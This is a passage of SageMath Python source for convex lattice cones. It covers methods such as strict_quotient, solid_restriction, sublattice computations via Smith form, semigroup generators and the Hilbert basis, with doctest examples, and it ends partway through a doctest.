Because a cone always contains the origin, this method returns ``False``.
EXAMPLES::
sage: trivial_cone = cones.trivial(3)
sage: trivial_cone.is_empty()
False
"""
return False
def is_trivial(self):
"""
Check if the cone has no rays.
OUTPUT:
- ``True`` if the cone has no rays, ``False`` otherwise.
EXAMPLES::
sage: c0 = cones.trivial(3)
sage: c0.is_trivial()
True
sage: c0.nrays()
0
"""
return self.nrays() == 0
is_compact = is_trivial
def is_strictly_convex(self):
r"""
Check if ``self`` is strictly convex.
A cone is called **strictly convex** if it does not contain any lines.
OUTPUT:
- ``True`` if ``self`` is strictly convex, ``False`` otherwise.
EXAMPLES::
sage: cone1 = Cone([(1,0), (0, 1)])
sage: cone2 = Cone([(1,0), (-1, 0)])
sage: cone1.is_strictly_convex()
True
sage: cone2.is_strictly_convex()
False
"""
if "_is_strictly_convex" not in self.__dict__:
convex = True
for gs in self._PPL_cone().minimized_generators():
if gs.is_line():
convex = False
break
self._is_strictly_convex = convex
return self._is_strictly_convex
@cached_method
def linear_subspace(self):
r"""
Return the largest linear subspace contained inside of ``self``.
OUTPUT:
- subspace of the ambient space of ``self``.
EXAMPLES::
sage: halfplane = Cone([(1,0), (0,1), (-1,0)])
sage: halfplane.linear_subspace()
Vector space of degree 2 and dimension 1 over Rational Field
Basis matrix:
[1 0]
TESTS:
The linear subspace of any closed convex cone can be identified
with the orthogonal complement of the span of its dual::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: expected = K.dual().span().vector_space().complement()
sage: K.linear_subspace() == expected
True
"""
if self.is_strictly_convex():
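# A strictly convex cone contains no lines, so its linear subspace is
# trivial: spanning the zero vector below yields the zero subspace of
# the ambient QQ-vector space.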
return span([vector(QQ, self.lattice_dim())], QQ)
return span(self.lines(), QQ)
@cached_method
def lines(self):
r"""
Return lines generating the linear subspace of ``self``.
OUTPUT:
- :class:`tuple` of primitive vectors in the lattice of ``self``
giving directions of lines that span the linear subspace of
``self``. These lines are arbitrary, but fixed. If you do not care
about the order, see also :meth:`line_set`.
EXAMPLES::
sage: halfplane = Cone([(1,0), (0,1), (-1,0)])
sage: halfplane.lines()
N(1, 0)
in 2-d lattice N
sage: fullplane = Cone([(1,0), (0,1), (-1,-1)])
sage: fullplane.lines()
N(0, 1),
N(1, 0)
in 2-d lattice N
"""
lines = []
for g in self._PPL_cone().minimized_generators():
if g.is_line():
lines.append(g.coefficients())
N = self.lattice()
lines = tuple(map(N, lines))
for l in lines:
l.set_immutable()
return PointCollection(lines, N)
def plot(self, **options):
r"""
Plot ``self``.
INPUT:
- any options for toric plots (see :func:`toric_plotter.options
<sage.geometry.toric_plotter.options>`), none are mandatory.
OUTPUT:
- a plot.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.plot() # optional - sage.plot
Graphics object consisting of 9 graphics primitives
"""
# What to do with 3-d cones in 5-d? Use some projection method?
deg = self.lattice().degree()
tp = ToricPlotter(options, deg, self.rays())
# Modify ray labels to match the ambient cone or fan.
tp.ray_label = label_list(tp.ray_label, self.nrays(), deg <= 2,
self.ambient_ray_indices())
result = tp.plot_lattice() + tp.plot_generators()
# To deal with non-strictly convex cones we separate rays and labels.
result += tp.plot_ray_labels()
tp.ray_label = None
lsd = self.linear_subspace().dimension()
if lsd == 1:
# Plot only rays of the line
v = self.lines()[0]
tp.set_rays([v, -v])
if lsd <= 1:
result += tp.plot_rays()
# Modify wall labels to match the ambient cone or fan too.
walls = self.faces(2)
try:
ambient_walls = self.ambient().faces(2)
except AttributeError:
ambient_walls = self.ambient().cones(2)
tp.wall_label = label_list(tp.wall_label, len(walls), deg <= 2,
[ambient_walls.index(wall) for wall in walls])
tp.set_rays(self.ambient().rays())
result += tp.plot_walls(walls)
return result
def polyhedron(self):
r"""
Return the polyhedron associated to ``self``.
Mathematically this polyhedron is the same as ``self``.
OUTPUT:
- :class:`~sage.geometry.polyhedron.base.Polyhedron_base`.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.polyhedron()
A 2-dimensional polyhedron in ZZ^2 defined as the convex hull
of 1 vertex and 2 rays
sage: line = Cone([(1,0), (-1,0)])
sage: line.polyhedron()
A 1-dimensional polyhedron in ZZ^2 defined as the convex hull
of 1 vertex and 1 line
Here is an example of a trivial cone (see :trac:`10237`)::
sage: origin = Cone([], lattice=ZZ^2)
sage: origin.polyhedron()
A 0-dimensional polyhedron in ZZ^2 defined as the convex hull
of 1 vertex
"""
return Polyhedron(rays=self.rays(), vertices=[self.lattice()(0)])
def an_affine_basis(self):
r"""
Return points in ``self`` that form a basis for the affine hull.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.an_affine_basis()
Traceback (most recent call last):
...
NotImplementedError: this function is not implemented for unbounded polyhedra
sage: ray = Cone([(1, 1)])
sage: ray.an_affine_basis()
Traceback (most recent call last):
...
NotImplementedError: this function is not implemented for unbounded polyhedra
sage: line = Cone([(1,0), (-1,0)])
sage: line.an_affine_basis()
Traceback (most recent call last):
...
NotImplementedError: this function is not implemented for unbounded polyhedra
"""
return self.polyhedron().an_affine_basis()
@cached_method
def strict_quotient(self):
r"""
Return the quotient of ``self`` by the linear subspace.
We define the **strict quotient** of a cone to be the image of this
cone in the quotient of the ambient space by the linear subspace of
the cone, i.e. it is the "complementary part" to the linear subspace.
OUTPUT:
- cone.
EXAMPLES::
sage: halfplane = Cone([(1,0), (0,1), (-1,0)])
sage: ssc = halfplane.strict_quotient()
sage: ssc
1-d cone in 1-d lattice N
sage: ssc.rays()
N(1)
in 1-d lattice N
sage: line = Cone([(1,0), (-1,0)])
sage: ssc = line.strict_quotient()
sage: ssc
0-d cone in 1-d lattice N
sage: ssc.rays()
Empty collection
in 1-d lattice N
The quotient of the trivial cone is trivial::
sage: K = cones.trivial(0)
sage: K.strict_quotient()
0-d cone in 0-d lattice N
sage: K = Cone([(0,0,0,0)])
sage: K.strict_quotient()
0-d cone in 4-d lattice N
TESTS:
The strict quotient of any cone should be strictly convex::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.strict_quotient().is_strictly_convex()
True
If the original cone is solid, then its strict quotient is proper::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, solid=True)
sage: K.strict_quotient().is_proper()
True
The strict quotient of a strictly convex cone is itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, strictly_convex=True)
sage: K.strict_quotient() is K
True
The complement of our linear subspace has the same dimension as
our dual, so the strict quotient cannot have a larger dimension
than our dual::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.strict_quotient().dim() <= K.dual().dim()
True
The strict quotient is idempotent::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K1 = K.strict_quotient()
sage: K2 = K1.strict_quotient()
sage: K1 is K2
True
"""
if self.is_strictly_convex():
return self
L = self.lattice()
Q = L.base_extend(QQ) / self.linear_subspace()
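# Work over QQ so that the quotient is a vector space; its dimension
# is lattice_dim() minus the lineality of the cone.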
# Maybe we can improve this one if we create something special
# for sublattices. But it seems to be the most natural choice
# for names. If many subcones land in the same lattice -
# that's just how it goes.
if is_ToricLattice(L):
S = ToricLattice(Q.dimension(), L._name, L._dual_name,
L._latex_name, L._latex_dual_name)
else:
S = ZZ**Q.dimension()
rays = ( Q(ray) for ray in self if not Q(ray).is_zero() )
quotient = Cone(rays, S, check=False)
quotient._is_strictly_convex = True
return quotient
@cached_method
def solid_restriction(self):
r"""
Return a solid representation of this cone in terms of a basis
of its :meth:`sublattice`.
We define the **solid restriction** of a cone to be a
representation of that cone in a basis of its own
sublattice. Since a cone's sublattice is just large enough to
hold the cone (by definition), the resulting solid restriction
:meth:`is_solid`. For convenience, the solid restriction lives
in a new lattice (of the appropriate dimension) and not actually
in the sublattice object returned by :meth:`sublattice`.
OUTPUT:
A solid cone in a new lattice having the same dimension as this
cone's :meth:`sublattice`.
EXAMPLES:
The nonnegative quadrant in the plane is left after we take its
solid restriction in space::
sage: K = Cone([(1,0,0), (0,1,0)])
sage: K.solid_restriction().rays()
N(0, 1),
N(1, 0)
in 2-d lattice N
The solid restriction of a single ray has the same
representation regardless of the ambient space::
sage: K = Cone([(1,0)])
sage: K.solid_restriction().rays()
N(1)
in 1-d lattice N
sage: K = Cone([(1,1,1)])
sage: K.solid_restriction().rays()
N(1)
in 1-d lattice N
The solid restriction of the trivial cone lives in a trivial space::
sage: K = cones.trivial(0)
sage: K.solid_restriction()
0-d cone in 0-d lattice N
sage: K = cones.trivial(4)
sage: K.solid_restriction()
0-d cone in 0-d lattice N
The solid restriction of a solid cone is itself::
sage: K = Cone([(1,1),(1,2)])
sage: K.solid_restriction() is K
True
TESTS:
The solid restriction of any cone is solid::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.solid_restriction().is_solid()
True
If a cone :meth:`is_strictly_convex`, then its solid restriction
:meth:`is_proper`::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, strictly_convex=True)
sage: K.solid_restriction().is_proper()
True
The solid restriction of a cone has the same dimension as the
original::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.solid_restriction().dim() == K.dim()
True
The solid restriction of a cone has the same number of rays as
the original::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.solid_restriction().nrays() == K.nrays()
True
The solid restriction of a cone has the same lineality as the
original::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.solid_restriction().lineality() == K.lineality()
True
The solid restriction of a cone has the same number of facets as
the original::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: len(K.solid_restriction().facets()) == len(K.facets())
True
"""
if self.is_solid():
return self
# Construct a NEW lattice ``S`` (of the appropriate dimension)
# to use. This works around the fact that it's difficult to
# work with sublattice objects. There are naming issues here
# similar to those in the strict_quotient() method.
L = self.lattice()
subL = self.sublattice()
S = ToricLattice(subL.dimension(), L._name,
L._dual_name, L._latex_name, L._latex_dual_name)
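# Re-expressing each ray in coordinates with respect to the basis of
# the spanned sublattice makes the cone full-dimensional (solid) in
# the new lattice S.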
# We don't need to check if these rays are zero: they will all
# have at least one non-zero coordinate; otherwise they would
# lie outside of the span of our cone. And they don't, because
# they generate the cone.
rays = ( S(subL.coordinates(ray)) for ray in self )
return Cone(rays, lattice=S, check=False)
def _split_ambient_lattice(self):
r"""
Compute a decomposition of the ``N``-lattice into `N_\sigma`
and its complement isomorphic to `N(\sigma)`.
You should not call this function directly, but call
:meth:`sublattice` and :meth:`sublattice_complement` instead.
EXAMPLES::
sage: c = Cone([ (1,2) ])
sage: c._split_ambient_lattice()
sage: c._sublattice
Sublattice <N(1, 2)>
sage: c._sublattice_complement
Sublattice <N(0, 1)>
Degenerate cases::
sage: C2_Z2 = Cone([(1,0),(1,2)])
sage: C2_Z2._split_ambient_lattice()
sage: C2_Z2._sublattice
Sublattice <N(1, 0), N(0, 1)>
Trivial cone::
sage: trivial_cone = cones.trivial(3)
sage: trivial_cone._split_ambient_lattice()
sage: trivial_cone._sublattice
Sublattice <>
sage: trivial_cone._sublattice_complement
Sublattice <N(1, 0, 0), N(0, 1, 0), N(0, 0, 1)>
"""
N = self.lattice()
n = N.dimension()
basis = self.rays().basis()
r = len(basis)
Nsigma = matrix(ZZ, r, n, ( N.coordinates(v) for v in basis ))
D, U, V = Nsigma.smith_form() # D = U*N*V <=> N = Uinv*D*Vinv
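# Here D = U * Nsigma * V with U, V unimodular.  In the new basis of N
# given by the rows of V^(-1) * N.basis_matrix(), the span of the rays
# is saturated by the first r basis vectors, while the remaining n - r
# vectors span a complementary sublattice.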
basis = (V.inverse() * N.basis_matrix()).rows()
# spanned lattice N_sigma
self._sublattice = N.submodule_with_basis(basis[:r])
# complement to the spanned lattice, isomorphic to N(sigma)
self._sublattice_complement = N.submodule_with_basis(basis[r:])
def sublattice(self, *args, **kwds):
r"""
The sublattice spanned by the cone.
Let `\sigma` be the given cone and `N=` ``self.lattice()`` the
ambient lattice. Then, in the notation of [Ful1993]_, this
method returns the sublattice
.. MATH::
N_\sigma \stackrel{\text{def}}{=} \mathop{span}( N\cap \sigma )
INPUT:
- either nothing or something that can be turned into an element of
this lattice.
OUTPUT:
- if no arguments were given, a :class:`toric sublattice
<sage.geometry.toric_lattice.ToricLattice_sublattice_with_basis>`,
otherwise the corresponding element of it.
.. NOTE::
* The sublattice spanned by the cone is the saturation of
the sublattice generated by the rays of the cone.
* If you only need a `\QQ`-basis, you may want to try the
:meth:`~sage.geometry.point_collection.PointCollection.basis`
method on the result of :meth:`~IntegralRayCollection.rays`.
* The returned lattice points are usually not rays of the
cone. In fact, for a non-smooth cone the rays do not
generate the sublattice `N_\sigma`, but only a finite
index sublattice.
EXAMPLES::
sage: cone = Cone([(1, 1, 1), (1, -1, 1), (-1, -1, 1), (-1, 1, 1)])
sage: cone.rays().basis()
N( 1, 1, 1),
N( 1, -1, 1),
N(-1, -1, 1)
in 3-d lattice N
sage: cone.rays().basis().matrix().det()
-4
sage: cone.sublattice()
Sublattice <N(1, 1, 1), N(0, -1, 0), N(-1, -1, 0)>
sage: matrix( cone.sublattice().gens() ).det()
-1
Another example::
sage: c = Cone([(1,2,3), (4,-5,1)])
sage: c
2-d cone in 3-d lattice N
sage: c.rays()
N(1, 2, 3),
N(4, -5, 1)
in 3-d lattice N
sage: c.sublattice()
Sublattice <N(4, -5, 1), N(1, 2, 3)>
sage: c.sublattice(5, -3, 4)
N(5, -3, 4)
sage: c.sublattice(1, 0, 0)
Traceback (most recent call last):
...
TypeError: element [1, 0, 0] is not in free module
"""
if "_sublattice" not in self.__dict__:
self._split_ambient_lattice()
if args or kwds:
return self._sublattice(*args, **kwds)
else:
return self._sublattice
def sublattice_quotient(self, *args, **kwds):
r"""
The quotient of the ambient lattice by the sublattice spanned
by the cone.
INPUT:
- either nothing or something that can be turned into an element of
this lattice.
OUTPUT:
- if no arguments were given, a :class:`quotient of a toric lattice
<sage.geometry.toric_lattice.ToricLattice_quotient>`,
otherwise the corresponding element of it.
EXAMPLES::
sage: C2_Z2 = Cone([(1,0),(1,2)]) # C^2/Z_2
sage: c1, c2 = C2_Z2.facets()
sage: c2.sublattice_quotient()
1-d lattice, quotient of 2-d lattice N by Sublattice <N(1, 2)>
sage: N = C2_Z2.lattice()
sage: n = N(1,1)
sage: n_bar = c2.sublattice_quotient(n); n_bar
N[1, 1]
sage: n_bar.lift()
N(1, 1)
sage: vector(n_bar)
(-1)
"""
if "_sublattice_quotient" not in self.__dict__:
self._sublattice_quotient = self.lattice() / self.sublattice()
if args or kwds:
return self._sublattice_quotient(*args, **kwds)
else:
return self._sublattice_quotient
def sublattice_complement(self, *args, **kwds):
r"""
A complement of the sublattice spanned by the cone.
In other words, :meth:`sublattice` and
:meth:`sublattice_complement` together form a
`\ZZ`-basis for the ambient :meth:`lattice()
<sage.geometry.cone.IntegralRayCollection.lattice>`.
In the notation of [Ful1993]_, let `\sigma` be the given cone
and `N=` ``self.lattice()`` the ambient lattice. Then this
method returns
.. MATH::
N(\sigma) \stackrel{\text{def}}{=} N / N_\sigma
lifted (non-canonically) to a sublattice of `N`.
INPUT:
- either nothing or something that can be turned into an element of
this lattice.
OUTPUT:
- if no arguments were given, a :class:`toric sublattice
<sage.geometry.toric_lattice.ToricLattice_sublattice_with_basis>`,
otherwise the corresponding element of it.
EXAMPLES::
sage: C2_Z2 = Cone([(1,0),(1,2)]) # C^2/Z_2
sage: c1, c2 = C2_Z2.facets()
sage: c2.sublattice()
Sublattice <N(1, 2)>
sage: c2.sublattice_complement()
Sublattice <N(0, 1)>
A more complicated example::
sage: c = Cone([(1,2,3), (4,-5,1)])
sage: c.sublattice()
Sublattice <N(4, -5, 1), N(1, 2, 3)>
sage: c.sublattice_complement()
Sublattice <N(2, -3, 0)>
sage: m = matrix( c.sublattice().gens() + c.sublattice_complement().gens() )
sage: m
[ 4 -5 1]
[ 1 2 3]
[ 2 -3 0]
sage: m.det()
-1
"""
if "_sublattice_complement" not in self.__dict__:
self._split_ambient_lattice()
if args or kwds:
return self._sublattice_complement(*args, **kwds)
else:
return self._sublattice_complement
def orthogonal_sublattice(self, *args, **kwds):
r"""
The sublattice (in the dual lattice) orthogonal to the
sublattice spanned by the cone.
Let `M=` ``self.dual_lattice()`` be the lattice dual to the
ambient lattice of the given cone `\sigma`. Then, in the
notation of [Ful1993]_, this method returns the sublattice
.. MATH::
M(\sigma) \stackrel{\text{def}}{=}
\sigma^\perp \cap M
\subset M
INPUT:
- either nothing or something that can be turned into an element of
this lattice.
OUTPUT:
- if no arguments were given, a :class:`toric sublattice
<sage.geometry.toric_lattice.ToricLattice_sublattice_with_basis>`,
otherwise the corresponding element of it.
EXAMPLES::
sage: c = Cone([(1,1,1), (1,-1,1), (-1,-1,1), (-1,1,1)])
sage: c.orthogonal_sublattice()
Sublattice <>
sage: c12 = Cone([(1,1,1), (1,-1,1)])
sage: c12.sublattice()
Sublattice <N(1, 1, 1), N(0, -1, 0)>
sage: c12.orthogonal_sublattice()
Sublattice <M(1, 0, -1)>
TESTS:
We check that :trac:`24541` is fixed::
sage: c = Cone([(1,0)], lattice=ZZ^2)
sage: c.orthogonal_sublattice()
Free module of degree 2 and rank 1 over Integer Ring
User basis matrix:
[0 1]
sage: c.dual()
2-d cone in 2-d lattice
"""
if "_orthogonal_sublattice" not in self.__dict__:
try:
self._orthogonal_sublattice = self.sublattice_quotient().dual()
except AttributeError:
N = self.lattice()
basis = self.rays().basis()
Nsigma = column_matrix(ZZ, (N.coordinates(v) for v in basis))
D, U, V = Nsigma.smith_form() # D = U * Nsigma * V
M = self.dual_lattice()
self._orthogonal_sublattice = M.submodule_with_basis(
U.rows()[len(basis):])
if args or kwds:
return self._orthogonal_sublattice(*args, **kwds)
else:
return self._orthogonal_sublattice
def relative_quotient(self, subcone):
r"""
The quotient of the spanned lattice by the lattice spanned by
a subcone.
In the notation of [Ful1993]_, let `N` be the ambient lattice
and `N_\sigma` the sublattice spanned by the given cone
`\sigma`. If `\rho < \sigma` is a subcone, then `N_\rho` =
``rho.sublattice()`` is a saturated sublattice of `N_\sigma` =
``self.sublattice()``. This method returns the quotient
lattice. The lifts of the quotient generators are
`\dim(\sigma)-\dim(\rho)` linearly independent primitive
lattice points that, together with `N_\rho`, generate
`N_\sigma`.
OUTPUT:
- :class:`toric lattice quotient
<sage.geometry.toric_lattice.ToricLattice_quotient>`.
.. NOTE::
* The quotient `N_\sigma / N_\rho` of spanned sublattices
has no torsion since the sublattice `N_\rho` is saturated.
* In the codimension one case, the generator of
`N_\sigma / N_\rho` is chosen to be in the same direction as the
image of `\sigma` in `N_\sigma / N_\rho`.
EXAMPLES::
sage: sigma = Cone([(1,1,1,3),(1,-1,1,3),(-1,-1,1,3),(-1,1,1,3)])
sage: rho = Cone([(-1, -1, 1, 3), (-1, 1, 1, 3)])
sage: sigma.sublattice()
Sublattice <N(1, 1, 1, 3), N(0, -1, 0, 0), N(-1, -1, 0, 0)>
sage: rho.sublattice()
Sublattice <N(-1, -1, 1, 3), N(0, 1, 0, 0)>
sage: sigma.relative_quotient(rho)
1-d lattice, quotient
of Sublattice <N(1, 1, 1, 3), N(0, -1, 0, 0), N(-1, -1, 0, 0)>
by Sublattice <N(1, 0, -1, -3), N(0, 1, 0, 0)>
sage: sigma.relative_quotient(rho).gens()
(N[1, 0, 0, 0],)
More complicated example::
sage: rho = Cone([(1, 2, 3), (1, -1, 1)])
sage: sigma = Cone([(1, 2, 3), (1, -1, 1), (-1, 1, 1), (-1, -1, 1)])
sage: N_sigma = sigma.sublattice()
sage: N_sigma
Sublattice <N(1, 2, 3), N(1, -1, 1), N(-1, -1, -2)>
sage: N_rho = rho.sublattice()
sage: N_rho
Sublattice <N(1, -1, 1), N(1, 2, 3)>
sage: sigma.relative_quotient(rho).gens()
(N[-1, -1, -2],)
sage: N = rho.lattice()
sage: N_sigma == N.span(N_rho.gens() + tuple(q.lift()
....: for q in sigma.relative_quotient(rho).gens()))
True
Sign choice in the codimension one case::
sage: sigma1 = Cone([(1, 2, 3), (1, -1, 1), (-1, 1, 1), (-1, -1, 1)]) # 3d
sage: sigma2 = Cone([(1, 1, -1), (1, 2, 3), (1, -1, 1), (1, -1, -1)]) # 3d
sage: rho = sigma1.intersection(sigma2)
sage: rho.sublattice()
Sublattice <N(1, -1, 1), N(1, 2, 3)>
sage: sigma1.relative_quotient(rho)
1-d lattice, quotient
of Sublattice <N(1, 2, 3), N(1, -1, 1), N(-1, -1, -2)>
by Sublattice <N(1, 2, 3), N(0, 3, 2)>
sage: sigma1.relative_quotient(rho).gens()
(N[-1, -1, -2],)
sage: sigma2.relative_quotient(rho).gens()
(N[0, 2, 1],)
"""
try:
cached_values = self._relative_quotient
except AttributeError:
self._relative_quotient = {}
cached_values = self._relative_quotient
try:
return cached_values[subcone]
except KeyError:
pass
Ncone = self.sublattice()
Nsubcone = subcone.sublattice()
extra_ray = None
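# In the codimension one case the quotient is generated by a single
# element; ``positive_point`` orients that generator towards the ray of
# ``self`` that does not lie in ``subcone`` (cf. the NOTE in the
# docstring).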
if Ncone.dimension()-Nsubcone.dimension()==1:
extra_ray = set(self.rays().set() - subcone.rays().set()).pop()
Q = Ncone.quotient(Nsubcone, positive_point=extra_ray)
assert Q.is_torsion_free()
cached_values[subcone] = Q
return Q
def relative_orthogonal_quotient(self, supercone):
r"""
The quotient of the dual spanned lattice by the dual of the
supercone's spanned lattice.
In the notation of [Ful1993]_, if ``supercone`` = `\rho >
\sigma` = ``self`` is a cone that contains `\sigma` as a face,
then `M(\rho)` = ``supercone.orthogonal_sublattice()`` is a
saturated sublattice of `M(\sigma)` =
``self.orthogonal_sublattice()``. This method returns the
quotient lattice. The lifts of the quotient generators are
`\dim(\rho)-\dim(\sigma)` linearly independent `M`-lattice
points that, together with `M(\rho)`, generate
`M(\sigma)`.
OUTPUT:
- :class:`toric lattice quotient
<sage.geometry.toric_lattice.ToricLattice_quotient>`.
If we call the output ``Mrho``, then
- ``Mrho.cover() == self.orthogonal_sublattice()``, and
- ``Mrho.relations() == supercone.orthogonal_sublattice()``.
.. NOTE::
* `M(\sigma) / M(\rho)` has no torsion since the sublattice
`M(\rho)` is saturated.
* In the codimension one case, (a lift of) the generator of
`M(\sigma) / M(\rho)` is chosen to be positive on `\sigma`.
EXAMPLES::
sage: rho = Cone([(1,1,1,3),(1,-1,1,3),(-1,-1,1,3),(-1,1,1,3)])
sage: rho.orthogonal_sublattice()
Sublattice <M(0, 0, 3, -1)>
sage: sigma = rho.facets()[1]
sage: sigma.orthogonal_sublattice()
Sublattice <M(0, 1, 1, 0), M(0, 0, 3, -1)>
sage: sigma.is_face_of(rho)
True
sage: Q = sigma.relative_orthogonal_quotient(rho); Q
1-d lattice, quotient
of Sublattice <M(0, 1, 1, 0), M(0, 0, 3, -1)>
by Sublattice <M(0, 0, 3, -1)>
sage: Q.gens()
(M[0, 1, 1, 0],)
Different codimension::
sage: rho = Cone([[1,-1,1,3],[-1,-1,1,3]])
sage: sigma = rho.facets()[0]
sage: sigma.orthogonal_sublattice()
Sublattice <M(1, 0, 2, -1), M(0, 1, 1, 0), M(0, 0, 3, -1)>
sage: rho.orthogonal_sublattice()
Sublattice <M(0, 1, 1, 0), M(0, 0, 3, -1)>
sage: sigma.relative_orthogonal_quotient(rho).gens()
(M[-1, 0, -2, 1],)
Sign choice in the codimension one case::
sage: sigma1 = Cone([(1, 2, 3), (1, -1, 1), (-1, 1, 1), (-1, -1, 1)]) # 3d
sage: sigma2 = Cone([(1, 1, -1), (1, 2, 3), (1, -1, 1), (1, -1, -1)]) # 3d
sage: rho = sigma1.intersection(sigma2)
sage: rho.relative_orthogonal_quotient(sigma1).gens()
(M[-5, -2, 3],)
sage: rho.relative_orthogonal_quotient(sigma2).gens()
(M[5, 2, -3],)
"""
try:
cached_values = self._relative_orthogonal_quotient
except AttributeError:
self._relative_orthogonal_quotient = {}
cached_values = self._relative_orthogonal_quotient
try:
return cached_values[supercone]
except KeyError:
pass
Mcone = self.orthogonal_sublattice()
Msupercone = supercone.orthogonal_sublattice()
extra_ray = None
if Mcone.dimension()-Msupercone.dimension()==1:
extra_ray = set(supercone.rays().set() - self.rays().set()).pop()
Q = Mcone.quotient(Msupercone, positive_dual_point=extra_ray)
assert Q.is_torsion_free()
cached_values[supercone] = Q
return Q
def semigroup_generators(self):
r"""
Return generators for the semigroup of lattice points of ``self``.
OUTPUT:
- a :class:`~sage.geometry.point_collection.PointCollection`
of lattice points generating the semigroup of lattice points
contained in ``self``.
.. note::
No attempt is made to return a minimal set of generators, see
:meth:`Hilbert_basis` for that.
EXAMPLES:
The following command ensures that the output ordering in the examples
below is independent of TOPCOM; you don't have to use it::
sage: PointConfiguration.set_engine('internal')
We start with a simple case of a non-smooth 2-dimensional cone::
sage: Cone([ (1,0), (1,2) ]).semigroup_generators()
N(1, 1),
N(1, 0),
N(1, 2)
in 2-d lattice N
A non-simplicial cone works, too::
sage: cone = Cone([(3,0,-1), (1,-1,0), (0,1,0), (0,0,1)])
sage: sorted(cone.semigroup_generators())
[N(0, 0, 1), N(0, 1, 0), N(1, -1, 0), N(1, 0, 0), N(3, 0, -1)]
GAP's toric package thinks this is challenging::
sage: cone = Cone([[1,2,3,4],[0,1,0,7],[3,1,0,2],[0,0,1,0]]).dual()
sage: len( cone.semigroup_generators() )
2806
The cone need not be strictly convex::
sage: halfplane = Cone([(1,0),(2,1),(-1,0)])
sage: sorted(halfplane.semigroup_generators())
[N(-1, 0), N(0, 1), N(1, 0)]
sage: line = Cone([(1,1,1),(-1,-1,-1)])
sage: sorted(line.semigroup_generators())
[N(-1, -1, -1), N(1, 1, 1)]
sage: wedge = Cone([ (1,0,0), (1,2,0), (0,0,1), (0,0,-1) ])
sage: sorted(wedge.semigroup_generators())
[N(0, 0, -1), N(0, 0, 1), N(1, 0, 0), N(1, 1, 0), N(1, 2, 0)]
Nor does it have to be full-dimensional (see :trac:`11312`)::
sage: Cone([(1,1,0), (-1,1,0)]).semigroup_generators()
N( 0, 1, 0),
N( 1, 1, 0),
N(-1, 1, 0)
in 3-d lattice N
Neither full-dimensional nor simplicial::
sage: A = matrix([(1, 3, 0), (-1, 0, 1), (1, 1, -2), (15, -2, 0)])
sage: A.elementary_divisors()
[1, 1, 1, 0]
sage: cone3d = Cone([(3,0,-1), (1,-1,0), (0,1,0), (0,0,1)])
sage: rays = ( A*vector(v) for v in cone3d.rays() )
sage: gens = Cone(rays).semigroup_generators(); sorted(gens)
[N(-2, -1, 0, 17),
N(0, 1, -2, 0),
N(1, -1, 1, 15),
N(3, -4, 5, 45),
N(3, 0, 1, -2)]
sage: set(map(tuple,gens)) == set( tuple(A*r) for r in cone3d.semigroup_generators() )
True
TESTS::
sage: len(Cone(identity_matrix(10).rows()).semigroup_generators())
10
sage: trivial_cone = cones.trivial(3)
sage: trivial_cone.semigroup_generators()
Empty collection
in 3-d lattice N
ALGORITHM:
If the cone is not simplicial, it is first triangulated. Each
simplicial subcone has the integral points of the spanned
parallelotope as generators. This is the first step of the
primal Normaliz algorithm, see [Normaliz]_. For each
simplicial cone (of dimension `d`), the integral points of the
open parallelotope
.. MATH::
par \langle x_1, \dots, x_d \rangle =
\ZZ^n \cap
\left\{
q_1 x_1 + \cdots +q_d x_d
:~
0 \leq q_i < 1
\right\}
are then computed [BK2001]_.
Finally, the union of the generators of all simplicial
subcones is returned.
"""
# if the cone is not simplicial, triangulate and run
# recursively
N = self.lattice()
if not self.is_simplicial():
from sage.geometry.triangulation.point_configuration \
import PointConfiguration
origin = self.nrays() # last one in pc
pc = PointConfiguration(tuple(self.rays()) + (N(0),), star=origin)
triangulation = pc.triangulate()
subcones = ( Cone(( self.ray(i) for i in simplex if i!=origin ),
lattice=N, check=False)
for simplex in triangulation )
gens = set()
for cone in subcones:
gens.update(cone.semigroup_generators())
return tuple(gens)
gens = list(parallelotope_points(self.rays(), N)) + list(self.rays())
gens = ( v for v in gens if gcd(v) == 1 )
return PointCollection(gens, N)
@cached_method
def Hilbert_basis(self):
r"""
Return the Hilbert basis of the cone.
Given a strictly convex cone `C\subset \RR^d`, the Hilbert
basis of `C` is the set of all irreducible elements in the
semigroup `C\cap \ZZ^d`. It is the unique minimal generating
set over `\ZZ` for the integral points `C\cap \ZZ^d`.
If the cone `C` is not strictly convex, this method finds the
(unique) minimal set of lattice points that need to be added
to the defining rays of the cone to generate the whole
semigroup `C\cap \ZZ^d`. But because the rays of the cone are
neither unique nor necessarily minimal in this case, neither is
the returned generating set (consisting of the rays plus
additional generators).
See also :meth:`semigroup_generators` if you are not
interested in a minimal set of generators.
OUTPUT:
- a
:class:`~sage.geometry.point_collection.PointCollection`. The
rays of ``self`` are the first ``self.nrays()`` entries.
EXAMPLES:
The following command ensures that the output ordering in the examples
below is independent of TOPCOM; you don't have to use it::
sage: PointConfiguration.set_engine('internal')
We start with a simple case of a non-smooth 2-dimensional cone::
sage: Cone([ (1,0), (1,2) ]).Hilbert_basis()
N(1, 0),
N(1, 2),
N(1, 1)
in 2-d lattice N
Two more complicated examples from GAP/toric::
sage: Cone([[1,0],[3,4]]).dual().Hilbert_basis()
M(0, 1),
M(4, -3),
M(1, 0),
M(2, -1),
M(3, -2)
in 2-d lattice M
sage: cone = Cone([[1,2,3,4],[0,1,0,7],[3,1,0,2],[0,0,1,0]]).dual()
sage: cone.Hilbert_basis() # long time
M(10, -7, 0, 1),
M(-5, 21, 0, -3),
M( 0, -2, 0, 1),
M(15, -63, 25, 9),
M( 2, -3, 0, 1),
M( 1, -4, 1, 1),
M( 4, -4, 0, 1),
M(-1, 3, 0, 0),
M( 1, -5, 2, 1),
